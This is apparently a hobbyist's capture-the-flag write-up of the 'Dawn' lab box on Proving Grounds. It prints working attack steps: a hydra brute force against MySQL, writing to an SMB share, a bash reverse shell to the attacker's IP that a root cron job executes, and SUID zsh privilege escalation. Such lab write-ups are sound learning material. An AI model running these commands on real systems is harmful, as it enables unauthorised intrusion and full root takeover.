Hiya. It’s a rainy weekend and my favorite mtn biking trails are wet so I’m staying in to hack boxes all weekend.
Today’s is Dawn on Proving Grounds.
Proving Grounds is a series of vulnerable systems we hack for experience and learning.
You connect with OpenVPN so you have a point-to-point connection with the target IP address.
From there, we probe it and scan for vulnerabilities and misconfigurations for a way to take control of the box.
It’s an _excellent_ way of learning both Hacking skills and general Linux skills.
tl;dr
– Nmap to find 80, 139, 445, 3306 open
– The two main operational ports well use are 80 to get intel from a log file, 139/445 to upload a bash reverse tcp shell.
– tcp/80 with a vulnerable version of apache didn’t play a factor. (Might be a good backup)
– 139/445 smb empty share called ITDEPT but we can write to it.
– smbclient //192.168.112.11/ITDEPT -U dawn and upload a bash reverse shell then call it for reverse shell.
– 3306 – MariaDB mysql but hydra+rockyou couldn’t crack it so probably a deadend
– In the target/logs/management.log we see a cron job entry for product-control so our reverse shell gets executed and it phones home to #nc -nvlp 443. Priv esc!
– Once it connects back, do a find / -perm -4000 2> /dev/null to find suid bit binaries. (They can run as root)
– One is /usr/bin/zsh
– $zsh to get # and find the flags for points.
More details
– nmap to find 80, 139, 445, 3306 (MariaDB/mysql) open.
– Gobuster found indexing available in a /logs dir http://target/logs/ – Notable management.log had usernames but no perms for other files like auth.log, error and daemon.log but it did indicate a cron job in a directory to which we can write. Easy peasy.
– Gobuster also found http://192.168.112.11/index.html – Under Construction.
– nmap -sSV found this:
80/tcp open http Apache httpd 2.4.38 ((Debian)) (Exploit available CVE-2019-0211)
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
– Searchsploit those versions for an exploit found this:
– CVE-2019-0211 Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php
- It's not a RCE - Remote Code Exploit, rather we need to run code as the Apache user (typically www-data) so we need a remote shell.
- Ran hydra against 3306 against mysql using root/dawn as username+rockyou.txt but errord "blocked because too many connection errors". Hydra has a throttling syntax but it was never going to work because of server config.
- Let's try smb vs 445: smbclient -L //targetIP
Sharename Type Comment
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. This looks interesting.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
– Connected with smbclient //192.168.112.11/ITDEPT -U dawn (no password but the share is empty)
– We can put files up to the share though. Maybe LFI? (Local file include for a reverse shell)
– Also with smbclient //192.168.112.11/IPC$ -U root (No password but empty directories)
– hydra -l root -P /home/loki/passes/rockyou.txt 192.168.112.11 mysql -t 1 -W 3 -f (Had to throttle)
! Hydra brute forcing pass for mysql probably won’t work. The throttling didn’t help. May be intentional.
– crackmapexec smb 192.168.112.11 –shares – doesn’t find any shares like smbclient did. Weird
– crackmapexec smb 192.168.112.11 -u ” -p ” –shares – Also doesn’t show shares.
– ffuf -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt:FUZZ -u http://192.168.112.11/FUZZ -e .php,.txt -of html -o ffuf-scan.html -c
– Moving along, we have an SMB share to which we can write.
– So, we’ll upload a bash reverse shell that looks like this and called product-control and that it’s executed by root under a cron job:
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.169/443 0>&1
– Simply (lol) upload it to the smb share, set up a reverse netcat listener with #nc -nvlp 443 and wait until the cronjob is executed.
– After a while, cron ran our revers shell and got a reverse shell automagically.
– Once we get local shell, do a $find / -perm -4000 2> /dev/null to find the suid bit binaries
– One is /usr/bin/zsh
– Drum rollol
– Just run zsh and you’re dumped into a root shell so then
– cat /home/dawn/local.txt
– cat /root/proof.txt for the flags and the win!
Great box.
Try one.